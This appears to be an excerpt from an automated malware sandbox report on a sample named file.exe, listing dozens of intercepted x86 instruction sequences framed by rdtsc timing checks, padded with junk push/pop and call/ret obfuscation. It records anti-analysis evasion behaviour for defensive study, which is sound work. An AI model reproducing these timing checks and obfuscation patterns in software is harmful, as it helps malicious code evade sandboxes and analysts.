                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87608 second address: A8766A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F0B44EA8C7Eh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3689h], edi 0x00000014 push 00000000h 0x00000016 mov edi, 24698803h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0B44EA8C78h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 sub esi, dword ptr [ebp+122D2880h] 0x0000003d mov dword ptr [ebp+122D2817h], edx 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jng 00007F0B44EA8C76h 0x0000004d push edi 0x0000004e pop edi 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A66A second address: A8A681 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B44BD79ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A887BE second address: A887DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F0B44EA8C78h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A681 second address: A8A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0B44BD79A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D271Fh], edi 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+12474C9Fh] 0x0000001d push 00000000h 0x0000001f movsx edi, ax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A6A9 second address: A8A6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0B44EA8C76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B5EF second address: A8B645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+12456239h], esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F0B44BD79A8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push ebx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e jmp 00007F0B44BD79ACh 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0B44BD79B3h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D775 second address: A8D7F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F0B44EA8C78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D209Eh], ebx 0x0000002a push 00000000h 0x0000002c jns 00007F0B44EA8C84h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F0B44EA8C78h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+122D2089h] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push eax 0x00000057 jno 00007F0B44EA8C76h 0x0000005d pop eax 0x0000005e pop eax 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C9A2 second address: A8C9BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F8A5 second address: A8F92C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F0B44EA8C76h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0B44EA8C7Bh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0B44EA8C78h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, 7B9F0856h 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D1F25h], ebx 0x0000003a mov ebx, dword ptr [ebp+122D286Fh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F0B44EA8C78h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c mov bl, 9Dh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F0B44EA8C84h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E966 second address: A8E96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9091E second address: A9099C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0B44EA8C78h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F0B44EA8C78h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 and edi, dword ptr [ebp+122D28DAh] 0x00000049 push 00000000h 0x0000004b mov dword ptr [ebp+122D2BC7h], eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jl 00007F0B44EA8C78h 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9099C second address: A909A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918DC second address: A918E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A929D5 second address: A929D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AC7 second address: A91AD1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AD1 second address: A91AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0B44BD79A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AF0 second address: A91B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91B0D second address: A91B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A938EB second address: A938FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C7Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A938FC second address: A93900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93900 second address: A9397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F0B44EA8C78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F0B44EA8C78h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D2ACAh], ebx 0x00000047 push 00000000h 0x00000049 add bh, 00000075h 0x0000004c xchg eax, esi 0x0000004d jmp 00007F0B44EA8C83h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jp 00007F0B44EA8C76h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9397F second address: A93983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93983 second address: A9398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95ACA second address: A95ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95ACE second address: A95AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C84h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95AE8 second address: A95AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A960B3 second address: A960B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97103 second address: A97107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97107 second address: A97145 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44EA8C78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F0B44EA8C7Bh 0x00000012 mov di, dx 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+122D22EFh], eax 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+1246304Ch], ebx 0x00000026 push eax 0x00000027 pushad 0x00000028 jng 00007F0B44EA8C78h 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007F0B44EA8C76h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98037 second address: A9803D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93B28 second address: A93B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9803D second address: A9804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0B44BD79ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9804A second address: A98056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96386 second address: A9638D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98FB8 second address: A98FC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B44EA8C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98192 second address: A9819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F0B44BD79A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9824F second address: A98253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98253 second address: A98259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F3D second address: A99F47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F47 second address: A99F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F4C second address: A99F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F52 second address: A99FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0B44BD79B0h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D209Eh], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0B44BD79A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007F0B44BD79AEh 0x00000038 mov dword ptr [ebp+122D2935h], ecx 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FB2 second address: A99FB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FB8 second address: A99FBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FBE second address: A99FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE1E second address: A9AE28 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B44BD79ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE28 second address: A9AE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0B44EA8C76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A11A second address: A9A11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE39 second address: A9AE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE3D second address: A9AE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE43 second address: A9AE4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1AAA second address: AA1AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1AAE second address: AA1AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA79DA second address: AA79E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7B96 second address: AA7B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEB46 second address: AAEB52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0B44BD79A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEB52 second address: AAEB57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADEE8 second address: AADEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE050 second address: AAE06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B44EA8C89h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE06E second address: AAE07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007F0B44BD79A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE5AA second address: AAE5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE888 second address: AAE898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F0B44BD79A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE898 second address: AAE89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9DB second address: AAE9E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9E1 second address: AAE9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9EA second address: AAEA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0B44BD79B9h 0x0000000b popad 0x0000000c jnl 00007F0B44BD79B2h 0x00000012 push edx 0x00000013 jno 00007F0B44BD79A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F4D second address: AB2F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F51 second address: AB2F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F5D second address: AB2F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0B44EA8C83h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F79 second address: AB2F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F80 second address: AB2F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30BC second address: AB30D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79ABh 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30D1 second address: AB30D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30D6 second address: AB30F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30F5 second address: AB30FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30FB second address: AB3115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB381B second address: AB3820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DA8 second address: AB3DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B5h 0x00000009 popad 0x0000000a jmp 00007F0B44BD79B0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DD2 second address: AB3DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44EA8C7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DE5 second address: AB3E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jmp 00007F0B44BD79B0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F0B44BD79ADh 0x0000001c pop edi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3E15 second address: AB3E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0B44EA8C76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68491 second address: A684A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jno 00007F0B44BD79A6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3967D second address: A39682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB429B second address: AB42AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
